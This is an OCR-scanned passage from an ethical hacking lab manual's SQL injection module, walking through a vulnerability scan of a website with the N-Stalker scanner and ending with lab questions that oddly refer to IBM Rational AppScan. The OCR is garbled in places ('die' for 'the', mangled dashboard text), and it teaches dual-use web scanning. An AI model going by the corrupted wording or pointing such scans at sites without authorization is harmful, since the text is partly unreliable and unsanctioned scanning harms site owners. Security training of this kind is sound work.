  34. 34. M odule 1 4 - S Q L In jectio n m Google Hacking Database (G H D B ) Tool is a unique application that w ill allow you to search for "google-like" queries within a saved spider data. NStalker, G H D B Tool can be invoked by clicking on "G H D B Tool" button under "Miscellaneous Tools": 15. You can view scanning details as shown in the following screenshot. ca H T T P Load Tester is a performance tester tool. It w ill run a Web Macro on a concurrent basis (up to you to decide how many instances) and w ill provide a report on number of connection failures and success. F IG U R E 4.14: N-Stalker Start Scan Status 16. N-Stalker will scan die site widi four different mediods. m d Macro Recorder is a tool to manage "W eb Macros" within N-Stalker W eb Application Security Scanner. F IG U R E 4.15: N-Stalker Scanning methods 17. C E H Lab Manual Page 814 111 the left pane, die W e b s ite tree displays die pages of the website. Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
  35. 35. M odule 1 4 - S Q L In jectio n m "W eb M acro" is a user-provided navigation script that is usually recorded using a web browser and a web proxy tooL Macro Recorder allows you to insert manual U R Ls as well and you must choose between an authentication or navigation macro. F IG U R E 4.16: N-Stalker Website Tree 18. m 111 R esu lts W izard, select the relevant options as shown 111 die following screenshot and click N e xt. A n authentication W eb Macro is used to authenticate N-Stalker's against W eb Forms or any other o f user interaction based authentication. Results Wizard Scan Session has finished successfully. N-Stalker found 12 vulnerabilities Session Management Options | ♦ Save scan results | O Discard scan results N e xt S te p s Total Scan Time 0 Hour(s) 4 Hinute(s) O Close scan session and return to main screen □ Total Vulnerabilities High: 0 Medium: 0 Low : 2 Info: Open N-Stalker Report Manager ® |<eep scan session fo r fu rth e r analysis] 10 F IG U R E 4.17: N-Stalker Results Wizard 19 As applications provide both a mean to login and logoff, Authentication Macros have a "logout detection" control that can be configured to prevent accidental logoff. C E H Lab Manual Page 815 ‫ . ש‬N-Stalker displays the summary of vulnerabilities. Click Done. Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
  36. 36. M odule 1 4 - S Q L In jectio n Results Wizard m Scan Session has finished successfully. llv. N-Stalker found 12 vulnerabilities m A navigation Web Macro is used to provide a specific path within the application to be followed by N-Stalker's spider engine. Summ ary Application Objects Total Scan Time 0 Hour(s) 4 Minute(s) Total Vulnerabilities High: 0 Medium: 0 Low : 2 Info: 10 A Count Total Web Pages High Vulnerabilities Medium Vulnerabilities Low Vulnerabilities Info Vulnerabilities Total Hosts Found Total HTTP Cookies Total Directories Found Total Web Forms Found Total Password Forms Total E-mails Found Total Client Scripts 8 0 0 2 10 1 0 0 = 3 0 0 9 ___________ 3 _________ Your request has been successfully processed. | m W hen you are generating reports, NStalker allows you to customize template and data that w ill be used to generate the final report. Both executive and technical reports allow for that customization. Done F IG U R E 4.18: N-Stalker Summary 20. You can view die complete scan results of die URL 111 the main dashboard ot die N -S talker. Applicotio‫■׳‬Scojnty Seancr2012‫־ ־‬rec Ldition * <v ' ---- 1 J. & Gooo* Maeknc n«*j!b*a# (GHO0) Signature Found •‫ 0 >&׳‬m0 Mo « .0n1 !» » 1 D 0 > » n4 « a 0 m These macros can use any U R Ls and w ill not be prevented from calling external services within NStalker's spider engine. F IG U R E 4.19: N-Stalker Dashboard Lab Analysis Analyze and document the results related to die lab exercise. Give your opinion on your target’s security posUire and exposure. Tool/Utility N-Stalker C E H Lab Manual Page 816 Information Collected/Objectives Achieved Scan session successfully processed with 12 vulnerabilities detected Ethical Hacking and Countenneasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
  37. 37. M odule 14 - S Q L In jectio n PL EASE T A L K T O YO UR I N S T R U C T O R IF YOU H A V E Q U E S T I O N S R E L A T E D T O T H I S LAB. Questions 1. Analyze how to speed up die scanning process and reduce the number of pages the IBM Rational AppScan finds. 2. Evaluate whether it is possible to perform scans against live production environments with IBM Rational AppScan. Will that cause damage or hurt the site? 3. Analyze how variables can be implemented 111 a multi-step sequence with IBM Radonal AppScan. Internet Connection Required □ Yes □ No Platform Supported 0 Classroom C E H Lab Manual Page 817 0 1Labs Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

×